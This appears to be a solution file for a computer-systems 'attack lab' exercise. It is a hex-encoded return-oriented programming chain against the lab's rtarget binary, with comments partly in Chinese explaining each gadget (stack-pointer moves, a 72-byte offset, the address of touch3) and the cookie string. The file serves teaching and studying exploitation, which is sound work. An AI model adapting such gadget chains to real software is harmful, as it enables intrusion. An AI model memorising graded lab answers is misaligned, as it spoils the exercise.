00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
/* padding */
0d 61 55 55 55 55 00 00
/* mov %rsp,%rax */
05 60 55 55 55 55 00 00
/* mov %rax,%rdi */
/* 把%rsp赋给%rdi */
1c 60 55 55 55 55 00 00
/* pop %rax */
48 00 00 00 00 00 00 00
/* cookie距第一次mov %rsp,%rax时%rsp的偏移值=72byte(十进制) */
8e 60 55 55 55 55 00 00
/* mov %eax,%ecx */
c4 60 55 55 55 55 00 00
/* mov %ecx,%edx */
9a 60 55 55 55 55 00 00
/* mov %edx,%esi */
/* 把偏移量赋给%rsi */
4e 60 55 55 55 55 00 00
/* %rax=%rdi+%rsi=%rsp+偏移量，即cookie的地址 */
05 60 55 55 55 55 00 00
/* mov %rax,%rdi */
3b 5f 55 55 55 55 00 00
/* touch3's adress */
37 37 63 34 37 31 31 32 00 
/* cookie */
